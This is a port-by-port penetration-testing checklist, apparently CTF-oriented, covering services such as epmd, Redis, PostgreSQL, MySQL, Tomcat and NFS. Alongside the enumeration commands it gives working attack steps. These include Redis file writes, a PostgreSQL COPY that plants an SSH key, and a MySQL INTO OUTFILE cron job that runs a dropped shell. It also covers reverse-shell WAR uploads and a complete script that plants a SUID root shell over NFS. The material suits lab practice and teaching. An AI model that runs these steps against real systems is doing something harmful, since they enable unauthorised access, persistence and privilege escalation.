• 50051 GRPC

    Enumeration Mandatory Optional

  • 53 DNS

    Enumeration
    Mandatory
    Try to perform a zone transfer:
      dig axfr @10.10.11.166 trick.htb

  • 4369 epmd

    Erlang Port Mapper Daemon
    Enumeration
    Mandatory
    Check if epmd is running (raw EPMD NAMES request; bash's echo, dash's echo has no -e):
      echo -n -e "\x00\x01\x6e" | nc -vn $target 4369
    Check with nmap:
      nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $target
    Brute-force the Erlang cookie with https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ and try the RCE against the node ports epmd reports.
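The EPMD exchange behind the one-liner above, as an added example (not code from the original checklist): the request is a 2-byte big-endian length followed by the byte 'n' (NAMES_REQ); the reply is epmd's own port as a 4-byte big-endian integer followed by one text line per registered node. Assumed: POSIX sh with od, awk and nc on PATH; $1 is the target host. The parser is what lets you pick the node port to point the cookie brute-forcer at.

```shell
#!/bin/sh
# Added example (not from the original checklist): speak EPMD by hand and
# decode the NAMES_RESP instead of eyeballing raw nc output.
# Assumed: POSIX sh, od, awk, nc; target host given as $1.

# NAMES_REQ: 2-byte big-endian length (=1) followed by the request byte 'n'.
epmd_names_req() {
    printf '\000\001n'
}

# Decode a NAMES_RESP stored in file $1:
#   bytes 0-3 : EPMD's listening port, big-endian uint32 (normally 4369)
#   bytes 4-  : one line per node, "name <node> at port <port>"
# Prints "epmd_port=<n>" and then "<node>:<port>" per registered node.
epmd_parse_reply() {
    reply="$1"
    set -- $(od -An -tu1 -N4 "$reply")
    [ $# -eq 4 ] || { echo "short reply" >&2; return 1; }
    echo "epmd_port=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))"
    tail -c +5 "$reply" |
        awk '$1 == "name" && $3 == "at" && $4 == "port" { print $2 ":" $5 }'
}

# Send NAMES_REQ to $1:4369 and decode whatever comes back.
epmd_names() {
    tmp=$(mktemp) || return 1
    epmd_names_req | nc -w 3 "$1" 4369 > "$tmp"
    epmd_parse_reply "$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}

# usage: epmd_names "$target"
```

Each "node:port" line is an Erlang distribution listener; that is the port the cookie brute-forcer and the RCE talk to, not 4369 itself. Some nc builds need -q instead of -w to close the connection after sending.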

  • 33060 MySQLX

    Enumeration
    Mandatory
    Try to connect. Start the console:
      /opt/mysql-shell-8.0.23-linux-glibc2.12-x86-64bit/bin# ./mysqlsh
    Try to connect with default credentials or found ones:
      MySQL JS > var test_conn = require('mysqlx');
      MySQL JS > var session = mysqlx.getSession({host: '192.168.156.58', user: 'root', password: 'root', port: 33060});

  • 4505/4506 Salt

    Enumeration
    Mandatory
    Check CVE-2020-11651 (salt-master ClearFuncs authentication bypass). Note that execution of scheduled tasks can take 5-10 minutes.

  • 27017 MongoDB

    Enumeration
    Try to just log in; by default no user is required:
      mongo $target
    Enumerate with NSE scripts:
      nmap -sV --script "mongo* and default" -p 27017 $target
    Try to connect with credentials:
      mongo 'mongodb://nodebb:nodebb@192.168.91.69:27017/nodebb'
    Optional
    Try https://github.com/codingo/NoSQLMap

  • 1521 Oracle SQL

    Enumeration
    See the Oracle article

  • 6667 IRC

    Enumeration
    Mandatory
    Enumerate with nmap (6667 is the plaintext port, 6697 the usual TLS port):
      nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6667,6697 $target
    Connect and get version information (for a TLS port use openssl s_client instead of telnet):
      telnet $target 6667
      USER duperuser4242 0 * duperuser4242
      NICK duperuser4242
      VERSION
      INFO
      HELP
    Optional

  • 119 NNTP

    Enumeration
    Mandatory
    Grab banner:
      telnet $target 119
    Enumerate with nmap:
      nmap -p 119 --script nntp-ntlm-info $target
    Optional

  • 110 POP3

    Enumeration
    Mandatory
    Grab banner (plain POP3 on 110, POP3S on 995):
      telnet $target 110
      openssl s_client -connect $target:995 -crlf -quiet
    In case of issues, see the openssl article. Search for exploits matching the banner version. If you have credentials, log in and read the emails.
    Optional

  • 465 SMTPS

    See the SMTP article

  • 3690 SVN

    Enumeration
    Mandatory
    Try to check out a repo:
      svn checkout svn://$target
    Optional
    Check all branches. Go through each revision (use grep widely!); deleted files and old configuration revisions are the usual finds. Add a new file which could be accessible on the web.
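The "go through each revision" step scripted, as an added example that is not part of the original checklist: list revisions, grep the lines added in every change set, and pull back files that were deleted later in the history. Assumed: svn and awk on PATH, $1 is the repository root URL (svn://$target as above), and SECRET_RE is only a starting keyword list.

```shell
#!/bin/sh
# Added example (not from the original checklist): walk the SVN history.
# Assumed: svn, awk on PATH; $1 = repository ROOT url, e.g. svn://$target.

SECRET_RE='passw|secret|token|api[_-]?key|PRIVATE KEY'   # starting point only

# "svn log -q" -> bare revision numbers, oldest first.
svn_rev_list() {
    awk '/^r[0-9]+ [|]/ { sub(/^r/, "", $1); print $1 }' | sort -n
}

# "svn log -v" -> "<rev> <path>" for every path deleted somewhere in history.
# Deleted config files are where old credentials usually survive.
svn_deleted_paths() {
    awk '/^r[0-9]+ [|]/ { rev = substr($1, 2) }
         /^   D /        { print rev, $2 }'
}

# grep the lines ADDED by every revision; prints "r<rev>: <line>".
svn_grep_history() {
    repo="$1"
    svn log -q "$repo" | svn_rev_list | while read -r rev; do
        svn diff -c "$rev" "$repo" 2>/dev/null |
            grep '^+' | grep -v '^+++' | grep -iE "$SECRET_RE" |
            sed "s/^+/r$rev: /"
    done
}

# Print every deleted file as it looked right before it was removed
# (peg revision rev-1; log -v paths are repository-root relative).
svn_recover_deleted() {
    repo="$1"
    svn log -v "$repo" | svn_deleted_paths | while read -r rev path; do
        prev=$((rev - 1))
        printf '=== %s (deleted in r%s, shown at r%s)\n' "$path" "$rev" "$prev"
        svn cat "$repo$path@$prev"
    done
}

# usage: svn_grep_history "svn://$target"
#        svn_recover_deleted "svn://$target"
```

svn cat fails on deleted directories; for those, svn ls "$repo$path@$prev" and recurse. Anonymous read access is enough for all four functions.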

  • 8009 Tomcat JServ

    Enumeration
    Mandatory
    Check on the HTTP port 8080 whether /manager is accessible (default credentials: tomcat / s3cret or admin / admin). If yes, upload a reverse-shell WAR file.
    Optional
    Try to brute-force with msf> use scanner/http/tomcat_mgr_login.

  • 6379 Redis

    Enumeration
    Mandatory
    Try to connect:
      telnet $target 6379     (or: redis-cli -h $target)
      info
      CONFIG GET *
      system.exec "id"        (not a built-in command; only answers if a module providing it has been loaded, e.g. by a rogue-server exploit)
    Try to check if you can determine the existence of directories (CONFIG SET dir makes the server chdir, so the reply leaks whether the path exists):
      config set dir /var/www/htdocs
      -ERR Changing directory: No such file or directory
      config set dir /etc
      +OK
    Try to write. General commands:
      config set dir /var/www/html
      +OK
      config set dbfilename t.txt
      +OK
      set test "hallo"
      +OK
      save
      +OK
    Possible places: Upload a…

  • 5985 WinRM

    Enumeration
    Mandatory
    Optional

  • 5900 VNC

    Enumeration
    Optional
    Brute force with nmap.

  • 5432 PostgreSQL

    Enumeration
    Mandatory
    Try to connect.
    Optional
    Privilege escalation within PSQL to superuser: https://staaldraad.github.io/post/2020-12-15-cve-2020-25695-postgresql-privesc/
    COPY to and from server files needs superuser (or, since PostgreSQL 11, the pg_read_server_files / pg_write_server_files roles).
    Try to read files:
      postgres=# CREATE TABLE demo(t text);
      CREATE TABLE
      postgres=# COPY demo FROM '/etc/passwd';
      COPY 20
      postgres=# SELECT * FROM demo;
    Try to write a file (here an SSH public key into the postgres OS user's authorized_keys):
      COPY (SELECT convert_from(decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESWh5ZEc3aUQ5a0ZoMjJLMklmNFpyc2FvbHlINVBabkZZK3JqaXRKV3VXTGhjVTQxVWtVUEZOYVJJM1dZcVFWdlJZSlpHRTB1VkFacHJuZFJEbWJtMUVGZER0N1JLejdoQ0tJUytpTjNwMUVuVTcrOVpFVUdMTEYzc1NOTFFzalNmWTVJaTlzSWVHUU01UnltbURwdGp3VVJJaWk0Z3ErMTZzVWVnSTU4WHdlVkxIZ2R1M0wrVWJ1c2lxSHVyLy9sSy9KZTFsTnNNVnJuTXJ1dnZ6Q3dvdUNXL2ZSV1dXRGRUbXJ6MXNhbmx6N1F6QjNZS3RrdmxiNEthTE5kL20xaUJyaWtzMEkrM2Ruc3lGT1h4d1kzWkJjVHB2Q3k4ZzdueDllb28zTjJtVEVaSS83WUxIeGFWbTlMVDRzWEdDWUtUN3Z1eE1EUmZHajdYcnhQUGVUaEggcm9vdEBpbWFjMjAxOS1rYWxpCg==','base64'),'utf-8')) TO '/var/lib/postgresql/.ssh/authorized_keys';

  • 3389 RDP

    Enumeration
    Mandatory
    Try to connect from within a window manager:
      rdesktop $target
    Optional
    If you have shell access, try to create a new user account in the group Remote Desktop Users or add this group to an existing user.

  • 3306 MySQL

    Enumeration
    Mandatory
    Try to connect to the DB. Enumerate with nmap:
      nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target
    Optional
    If you have access to the DB (file access needs the FILE privilege and a secure_file_priv setting that does not block the path):
    Try to read local files:
      SELECT load_file('/etc/passwd');
    Try to write files (here a cron job that runs a dropped binary every minute):
      CREATE TABLE bbb(content TEXT);
      INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");
      SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';

  • 1433 MSSQL

    Enumeration
    Mandatory
    Determine version (the script can also discover instances through the browser service on UDP 1434 and SMB named pipes on 445):
      nmap -p 1433 --script ms-sql-info $target
    If credentials are known:
    Try to connect to the DB (alternative: IntelliJ, …):
      sqsh -U sa -P $password -S $target:1433
    Try to execute commands:
      msf> use auxiliary/admin/mssql/mssql_exec
      msf> use windows/mssql/mssql_payload
    If mssql_exec doesn't work, take care of domain/username and the powershell.exe -command type system.
    Optional
    Brute-force login (e.g. with msf> use…

  • 1100 Java RMI

    Enumeration
    Mandatory
    Check configuration:
      nmap -sSVC --script rmi-dumpregistry -p 1100 $target
    Optional
    Try msf> use scanner/misc/java_rmi_server to see whether class upload is possible; if yes, try msf> use multi/misc/java_rmi_server. Try to exploit with BaRMIe.

  • 554 RTSP

    Enumeration
    Mandatory
    Check which streams are open:
      nmap --script rtsp-url-brute -p 554 $target

  • 500 IKE

    Enumeration
    Mandatory
    Enumerate with ike-scan

  • 636 LDAPS

    See the LDAP checklist

  • 389 LDAP

    Enumeration
    Mandatory
    Enumerate with nmap:
      nmap -n -sV --script "ldap* and not brute" $target
    Scan with ldapsearch (anonymous bind; adjust the base DN to the target domain):
      ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local"
    Connect to the SSL ports (636 LDAPS, 3269 Global Catalog over SSL):
      openssl s_client -connect $target:636 </dev/null
      openssl s_client -connect $target:3269 </dev/null

  • 161 SNMP

    Enumeration Mandatory

  • 139/445 SMB

    Note: 139 is SMB over the NetBIOS session service (a session-layer protocol), 445 is SMB directly over TCP; both can expose the same shares.
    Enumeration
    Mandatory
    If you have no credentials yet:
    If you already have user credentials:
    On Windows
    Optional

  • 135 RPC

    Enumeration
    Mandatory
    Get a list of registered programs via rpcbind v2 (formerly portmapper; this queries port 111, not 135):
      rpcinfo -p $target
    Get a list of registered programs via rpcbind v3:
      rpcinfo -s $target
    If successful, connect with the RPC console (MS-RPC over SMB, port 445):
      rpcclient -U "" $target
    Enumerate with the queries on the RPC protocol post.
    Optional
    Try to brute-force accounts (check the lockout policy first). Try other enumeration tools from the…

  • 113 Ident

    Enumeration
    Mandatory
    Show users and processes for known open ports (append every known port):
      ident-user-enum $target 139 445 …

  • 111 NFS

    Enumeration
    Mandatory
    Check if the target exposes open shares:
      showmount -e $target
    If there are some, try to mount them. If you can mount them, check if you can write files and set the s flag (only sticks if the export is defined with no_root_squash). If yes, create a new file with the SUID bit; the file must live on a filesystem the target does not mount nosuid, and the binary has to keep the effective uid (e.g. exec sh -p) for the shell to stay root.
    Optional
    Try to use another NFS…
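The showmount / mount / SUID procedure above scripted end to end, as an added example that is not code from the original checklist. Assumed: run as root on the attacking host (so the file written over NFS carries uid 0), gcc and mount.nfs present, an NFSv3 export, and placeholder hostnames and paths in the usage lines.

```shell
#!/bin/sh
# Added example (not from the original checklist). Assumed: root on the
# attacker box, gcc + mount.nfs available, NFSv3; hostnames/paths are placeholders.

# "showmount -e" prints "Export list for <host>:" and then "<path> <clients>".
# Tag each export WORLD (no client restriction: "*" or "(everyone)") or LIMITED.
nfs_export_list() {
    awk 'NR > 1 && NF >= 2 {
            tag = ($2 == "*" || $2 == "(everyone)") ? "WORLD" : "LIMITED"
            print tag, $1, $2
         }'
}

# Mount one export, drop a SUID root shell spawner on it and verify ownership.
# With no_root_squash the server stores uid 0 as uid 0, so the file is SUID
# root on the target as well; with root_squash it ends up as nobody/nfsnobody
# and chown fails, which is the quickest way to tell the two apart.
nfs_plant_suid() {   # $1 target, $2 export path, $3 local mount point
    target="$1"; export_path="$2"; mnt="$3"
    mkdir -p "$mnt"
    mount -t nfs -o vers=3 "$target:$export_path" "$mnt" || return 1
    touch "$mnt/.w" 2>/dev/null || { echo "export is read-only" >&2; return 1; }
    rm -f "$mnt/.w"
    cat > "$mnt/suid.c" <<'EOF'
#include <unistd.h>
int main(void) {
    setgid(0); setuid(0);
    /* -p keeps the effective uid; plain sh/bash would drop it again */
    execl("/bin/sh", "sh", "-p", (char *)0);
    return 1;
}
EOF
    # -static avoids libc mismatches between attacker and target
    gcc -static -o "$mnt/suid" "$mnt/suid.c" || return 1
    chown root:root "$mnt/suid" && chmod 4755 "$mnt/suid"
    ls -ln "$mnt/suid"   # expect uid/gid 0 and mode -rwsr-xr-x
}

# usage: showmount -e "$target" | nfs_export_list
#        nfs_plant_suid "$target" /srv/share /mnt/nfs
```

On the target, run the binary from the export's server-side path (e.g. /srv/share/suid) as the low-privileged user. If ls -ln shows uid 65534 instead of 0 after the chown, root_squash is active and the trick does not apply; if the export is read-only for everyone, the touch check fails before anything is compiled.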